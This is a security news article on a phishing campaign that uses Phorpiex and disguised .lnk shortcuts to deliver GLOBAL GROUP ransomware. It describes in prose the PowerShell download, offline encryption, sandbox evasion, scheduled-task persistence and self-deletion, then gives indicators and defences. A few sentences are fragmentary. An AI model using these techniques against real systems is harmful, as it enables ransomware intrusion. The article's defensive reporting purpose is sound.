A high-volume phishing campaign leveraging the Phorpiex botnet has been distributing GLOBAL GROUP ransomware through weaponized Windows shortcut files.
The attack begins with an email attachment named Document.doc.lnk. Windows’ default behavior of hiding known file extensions makes this shortcut appear as a legitimate Word document to unsuspecting users.
Attackers enhance deception by borrowing icons from Windows system files, such as shell32.dll, creating a familiar visual cue that reduces hesitation before clicking.
When opened, the shortcut silently launches cmd.exe in the background, which then invokes PowerShell to download a second-stage payload from a remote server.
Security researchers recently identified emails with the subject line “Your Document” a phrase that has dominated large-scale campaigns throughout 2024 and 2025 containing malicious .lnk attachments designed to bypass user suspicion.
By combining social engineering, stealthy execution, and LivingofftheLand (LotL) techniques, the file silently retrieves and launches a second stage payload raising suspicion.
The malicious file, named windrv.exe to resemble a legitimate Windows driver, is saved to the victim’s system and executed automatically all without visible warnings or installation prompts.
GLOBAL GROUP Threat
GLOBAL GROUP ransomware represents a concerning evolution in ransomware design. Unlike traditional variants that communicate with command-and-control servers, this ransomware operates entirely offline in “mute” mode.
It generates encryption keys locally on the infected machine, meaning it can function in air-gapped or isolated environments where network monitoring would typically detect suspicious activity.
The ransomware encrypts files using the robust ChaCha20-Poly1305 algorithm, appending them with the.Reco extension.
This encryption method includes authentication features that prevent tampering, making decryption impossible without the attacker’s private key. Previous decryption tools for similar malware families are ineffective against GLOBAL GROUP.
GLOBAL GROUP employs sophisticated techniques to avoid detection and maximize damage. It checks for virtualized environments and analysis tools commonly used by security researchers, allowing it to evade sandbox detection.
Task Scheduler to create a task named “CoolTask” that executes at system startup with SYSTEM privileges, triggers it immediately.
The malware terminates database processes to unlock files for encryption and uses a ping command as a timer before deleting itself from disk to hinder forensic investigation.
The ransomware establishes persistence through Windows services and scheduled tasks, while its lateral movement capabilities enable it to spread across networks.
Detection Indicators
Infected systems display telltale signs including a changed desktop wallpaper announcing the GLOBAL GROUP compromise, encrypted files with the .Reco extension, and README.Reco.txt ransom notes directing victims to a Tor-based payment site.
Technical indicators include the mutex “GlobalFxo16jmdgujs437” and a unique file marker “xcrydtednotstill_amazingg_time!!” visible in hex editors.
Querying Active Directory and creating services on remote machines. It can even clear event logs to conceal its activities.
This campaign highlights why shortcut files remain effective attack vectors and underscores the limitations of network-based detection alone.
Organizations should prioritize endpoint behavior monitoring, turn off automatic execution of shortcut files from email attachments, and ensure file extensions are visible in Windows Explorer.
Regular offline backups remain the most reliable defense against ransomware that operates without network connectivity.
Follow us on Google News, LinkedIn, and X to Get Instant Updates and Set GBH as a Preferred Source in Google.
